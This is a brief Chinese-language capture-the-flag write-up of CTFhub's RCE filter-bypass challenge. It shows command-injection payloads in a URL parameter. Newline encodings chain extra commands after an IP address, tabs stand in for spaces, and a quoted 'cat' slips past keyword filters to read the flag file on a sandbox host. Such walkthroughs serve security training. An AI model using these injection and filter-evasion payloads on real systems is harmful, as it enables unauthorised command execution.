CTFhub-RCE-综合过滤练习

%0a%0d%0D%0A

burp 抓包

修改请求为 POST  /?127.0.0.1%0als 列出当前目录

CTFhub-RCE-综合过滤练习_第1张图片

返回包

CTFhub-RCE-综合过滤练习_第2张图片

CTFhub-RCE-综合过滤练习_第3张图片

CTFhub-RCE-综合过滤练习_第4张图片

CTFhub-RCE-综合过滤练习_第5张图片

CTFhub-RCE-综合过滤练习_第6张图片

http://challenge-135e46015a30567b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd%09*here%0ac%27a%27t%09*
_311632412323588.php

你可能感兴趣的:(CTFhub-RCE,网络安全,安全,php)